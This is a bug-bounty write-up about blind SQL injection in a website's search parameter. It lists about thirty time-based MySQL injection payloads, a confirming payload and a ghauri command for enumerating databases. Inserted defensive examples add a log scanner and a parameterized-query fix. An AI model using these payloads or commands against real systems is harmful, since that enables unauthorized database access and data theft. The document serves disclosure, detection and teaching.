Behind the Scenes of a $2500 Reward: Exploring SQL Injection on a Search Page
In the vast landscape of cyberspace, where lines of code construct virtual realms and digital doors protect valuable information, an intriguing challenge presented itself before me. Little did I know that this seemingly ordinary search page would become the gateway to a thrilling adventure — one that would not only test my technical prowess but also reward my dedication with an unexpected bounty of $2500.
Just like a detective drawn to a puzzling case, I embarked on a journey that led me to uncover the hidden threat of SQL injection. In this blog post, I invite you to join me in reliving the moments of my discovery, a tale that showcases the power of curiosity, ethical hacking, and the profound impact it can have on the digital world. As the story unfolds, you'll witness how a few lines of malicious code turned into a triumph of cybersecurity, underlining the importance of vigilance in an age where information is both our asset and our vulnerability.
The Journey of Discovery: Unraveling SQL Injection
In the vast expanse of the digital landscape, where websites serve as gateways to boundless information, lies a hidden realm of vulnerabilities — a realm I stumbled upon during a seemingly ordinary web exploration. Little did I know that this journey would lead me to unveil a hidden threat known as SQL injection, a discovery that would later earn me a reward of $2500.
My journey began when I encountered a specific search query parameter, "search=", on a website. With a spark of curiosity, I realized that this parameter could potentially be a gateway to something more intriguing — something that lay beneath the surface. Eager to explore, I started with the basics, attempting common SQL injection payloads, but to no avail.
Initial Testing Phase
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+
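From the defender's side, a probing session like the one above leaves a recognisable trail in the web server's access log: URL-encoded or comment-spliced SLEEP()/sysdate() expressions in the search parameter, and, where the injection actually executed, a response time that matches the requested delay. The following is an added example, not code from the post, that scans a constructed sample log for those two signals. It assumes a combined log format with one extra trailing field holding the response time in seconds (a custom LogFormat, assumed here) and uses two payload shapes from the list above as the constructed probe lines.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample in combined log format plus a trailing response-time
# field in seconds (assumes a custom LogFormat). None of this is real traffic;
# lines 2 and 3 reuse two payload shapes from the list in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2023:14:01:02 +0000] "GET /search?search=blue+widget HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.041
203.0.113.9 - - [10/Aug/2023:14:01:09 +0000] "GET /search?search=0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z HTTP/1.1" 200 5120 "-" "curl/8.1" 5.062
203.0.113.9 - - [10/Aug/2023:14:01:31 +0000] "GET /search?search=%27and(select*from(select%2Bsleep(10))a/**/union/**/select%2B1)%3D%27 HTTP/1.1" 200 5120 "-" "curl/8.1" 10.118
203.0.113.11 - - [10/Aug/2023:14:02:00 +0000] "GET /search?search=sleepy+sunday HTTP/1.1" 200 4880 "-" "Mozilla/5.0" 0.038
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>\d+(?:\.\d+)?)$'
)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)           # /**/ used as a token separator
SLEEP_RE = re.compile(r"sleep\s*\(\s*(\d+(?:\.\d+)?)", re.I)
SYSDATE_RE = re.compile(r"now\s*\(\s*\)\s*(?:=|like)\s*\(?\s*sysdate\s*\(", re.I)

def normalize(query):
    """URL-decode the raw query string until it stops changing (this also
    unwraps double encoding), then replace inline comments with spaces."""
    decoded = query
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return COMMENT_RE.sub(" ", decoded)

def classify(decoded):
    """Return (requested SLEEP delay or None, list of matched signatures)."""
    sigs = []
    delay = None
    m = SLEEP_RE.search(decoded)
    if m:
        sigs.append("sleep")
        delay = float(m.group(1))
    if SYSDATE_RE.search(decoded):
        sigs.append("now=sysdate")
    return delay, sigs

def scan_log(text, slack=0.8):
    """Flag requests carrying time-based SQLi signatures. A finding whose
    response time is close to the requested delay is marked delay_observed,
    meaning the injected SLEEP() most likely ran and the case needs escalation."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = normalize(urlsplit(m.group("target")).query)
        delay, sigs = classify(decoded)
        if not sigs:
            continue
        rt = float(m.group("rt"))
        findings.append({
            "line": lineno,
            "ip": m.group("ip"),
            "signatures": sigs,
            "requested_delay": delay,
            "response_time": rt,
            "delay_observed": delay is not None and rt >= slack * delay,
        })
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The response-time field is what turns a noisy signature match into a prioritised alert: a probe that the server answered in 40 ms is reconnaissance, while one that stalled for the full ten seconds is evidence that the search parameter is being parsed as SQL. The decode loop matters because several entries in the list above rely on `%2b`, `%2c` or `%09` to slip past naive pattern matching on the raw request line.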
As I encountered roadblocks, my determination only grew stronger. I recalled tales of "blind" SQL injection — a more elusive technique that required patience and precision. Armed with this knowledge, I delved deeper into the art of crafting payloads that could reveal the database's inner workings. Hours turned into days as I experimented, each attempt guiding me closer to understanding the system's vulnerabilities.
Then, it happened — an ingenious payload, like a key turning in a lock, granted me access to the system. The thrill of discovery surged through me as I realized I had successfully confirmed the presence of a SQL injection vulnerability. To document this pivotal moment, I captured snapshots of the request and response times, creating a digital record of my triumph.
'and(select*from(select+sleep(10))a/**/union/**/select+1)='
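What makes the payload above a confirmation rather than a guess is the timing oracle: the same request with and without the injected expression, compared on response time, repeated enough times to rule out a single slow response. The following is an added example, not the post's own code, that reproduces that confirmation step offline and places the vulnerable query pattern next to the fix. It stands in for the site's MySQL backend with an in-memory SQLite database, registers a Python function under the name `sleep` only so the oracle can be reproduced (SQLite has no SLEEP()), shortens the delay from the post's sleep(10) to 0.3 seconds, and decodes the payload's URL-encoded `+` to spaces. It serves both this passage and the "Crafting the Payload" and "Confirming the Vulnerability" steps later in the post.

```python
import sqlite3
import time

# Constructed stand-in for the site's backend: an in-memory SQLite database.
# SQLite has no SLEEP(), so a Python function is registered under that name
# purely to reproduce the post's timing oracle offline.
SLEEP_SECONDS = 0.3  # shortened from the post's sleep(10) to keep the demo quick

# The post's confirming payload, with the URL-encoded '+' decoded to spaces
# and the delay swapped for SLEEP_SECONDS.
PROBE = f"'and(select*from(select sleep({SLEEP_SECONDS}))a/**/union/**/select 1)='"
BASELINE = "widget"  # a benign search term used as the timing reference

def _fake_sleep(seconds):
    time.sleep(seconds)
    return 0  # MySQL's SLEEP() also returns 0 on completion

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, _fake_sleep)
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)",
                     [("blue widget",), ("red gadget",), ("green gizmo",)])
    return conn

def search_vulnerable(conn, term):
    # String-built query: whatever arrives in search= is parsed as SQL,
    # so the probe's subquery executes and the request stalls.
    sql = f"SELECT id, name FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()

def search_parameterized(conn, term):
    # Bound parameter: the same text is only ever compared as a string value,
    # so the probe matches nothing and returns immediately.
    sql = "SELECT id, name FROM products WHERE name LIKE '%' || ? || '%'"
    return conn.execute(sql, (term,)).fetchall()

def timed(fn, conn, term):
    start = time.perf_counter()
    rows = fn(conn, term)
    return rows, time.perf_counter() - start

def confirm_time_based(fn, conn, baseline, probe, expected_delay, trials=3):
    """Time-based confirmation as the post describes it: the probe must take
    roughly expected_delay longer than the benign baseline on every trial,
    so one slow request cannot produce a false positive."""
    for _ in range(trials):
        _, t_base = timed(fn, conn, baseline)
        _, t_probe = timed(fn, conn, probe)
        if t_probe - t_base < 0.8 * expected_delay:
            return False
    return True

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", confirm_time_based(search_vulnerable, conn, BASELINE, PROBE, SLEEP_SECONDS))
    print("parameterized:", confirm_time_based(search_parameterized, conn, BASELINE, PROBE, SLEEP_SECONDS))
```

Running it shows the two search functions returning the same rows for an ordinary term, while only the string-built one stalls for the probe. That is the whole remediation story for this class of bug: bind the value instead of splicing it into the statement, and the timing oracle disappears.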
Exploitation and Discovery
Wanting to delve even deeper, I sought tools that could aid in exploiting this newfound vulnerability. Initially, I turned to the well-regarded SQL injection testing tool, SQLMap. Armed with the captured request, I set SQLMap on its course. However, for reasons unknown, SQLMap encountered hurdles and was unable to fully exploit the vulnerability.
Determined not to be deterred, I explored alternative avenues. Enter "ghauri," a tool designed to wield the power of SQL injection for ethical hackers. Armed with the captured request file, I crafted a command, "ghauri -r request.txt --dbs". With a sense of anticipation, I executed the command, and lo and behold, the names of the databases residing within the system unveiled themselves.
Like a modern-day explorer, I embarked on a journey through the databases, navigating uncharted territories within the digital landscape. I methodically enumerated tables and columns, revealing the intricate architecture that held valuable data.
ghauri -r request.txt --dbs

Visual representation of SQL Injection attack flow
As my understanding deepened, I recognized the gravity of the impact a successful SQL injection attack could have had — sensitive data exposed, user trust eroded. The importance of responsible disclosure weighed heavily on me.
Guided by ethics, I compiled my findings and prepared to share them with the organization responsible for the vulnerable website. It was a pivotal moment — an opportunity to both protect user data and contribute to a safer online ecosystem.
The organization's response was not only appreciative but also generous. They recognized the significance of my discovery and rewarded my efforts with a $2500 bounty — a gesture that affirmed the value of ethical hacking and the impact it can have.
Through this journey, I learned that in the interconnected world of technology, curiosity and persistence can lead to profound discoveries. My experience underscores the vital role ethical hackers play in safeguarding the digital realm, one vulnerability at a time. Armed with knowledge, tools, and a sense of responsibility, we can collectively fortify our online environments and ensure a safer digital future.
Steps to Reproduce
- Capturing the Target
The journey began with a search query — a seemingly innocuous parameter, "search=", on the target website. With the understanding that this parameter could potentially harbor vulnerabilities, I embarked on the first step: capturing the HTTP request.
By intercepting the request using tools like Burp Suite or browser developer tools, I secured a snapshot of the communication between my browser and the website's server. This snapshot was the key that unlocked the door to potential vulnerabilities.
- Crafting the Payload
With the request in hand, I ventured into the world of payloads. Blind SQL injection demands precision — each payload meticulously designed to provoke discernible responses from the server.
Based on my knowledge and experience, I crafted a blind SQL injection payload — a string of characters that, when injected into the parameter, would prompt the server to reveal subtle cues in its responses.
- Confirming the Vulnerability
The heart of the process lay in the responses — the way the server reacted to my payloads. As I injected different variations of the payload, I watched for changes in the site's behavior. These changes were the breadcrumbs guiding me toward confirmation.
A response delayed by the amount the payload asked for signaled the presence of a vulnerability. In this case, a successful payload would indicate that the server was processing the SQL injection, setting the stage for deeper exploration.
- Documenting the Triumph
With vulnerability confirmed, I documented the journey. I saved the request, complete with the successful payload, into a file. This record would serve as a reference point — a tangible piece of evidence that encapsulated the moment of discovery.
- Leveraging Ghauri
But the journey didn't stop at vulnerability confirmation; it evolved into exploitation. While tried-and-true tools like SQLMap faltered in this case, the innovative spirit of ethical hacking led me to Ghauri — a tool that promised a fresh approach.
With the captured request file in hand, I invoked Ghauri's power through a command, "ghauri -r request.txt --dbs". The command, like a key turning in a lock, opened the doors to the database realm.
- Unveiling the Databases
The databases unfurled before me, each with its own secrets and stories. This moment was akin to lifting the veil on a trove of information — names that hinted at the breadth of data residing within.
As I navigated the databases, I recognized that this was only the beginning — an entry point to a labyrinth of data, tables, and columns that held the potential to transform understanding into insight.
- Reporting and Recognition
In this journey, discovery wasn't the final destination; responsibility followed closely. Armed with knowledge, I compiled my findings into a comprehensive report. I reached out to the organization behind the website, prepared to share both the vulnerability and the steps to remedy it.
Their response was not only appreciative but also rewarding. A bounty of $2500 served as recognition for my commitment to ethical hacking, the responsible disclosure of vulnerabilities, and the potential impact of my actions.
Conclusion
As ethical hackers, we're the guardians of the digital realm, charting a path of vigilance and knowledge. From crafting payloads to leveraging tools, our actions shape the online landscape, fortifying it against threats.
Let this journey remind us that with each discovery, we contribute to a safer digital future — one vulnerability at a time. Together, we ensure that technology remains a force for progress, innovation, and trust.
As the digital horizon expands, let our commitment to ethical hacking remain unwavering. For in our pursuit lies the promise of a more secure, resilient, and interconnected world.
Step forward, for the journey continues — where lines of code become opportunities, vulnerabilities become lessons, and the path to a safer digital world is illuminated by our collective dedication.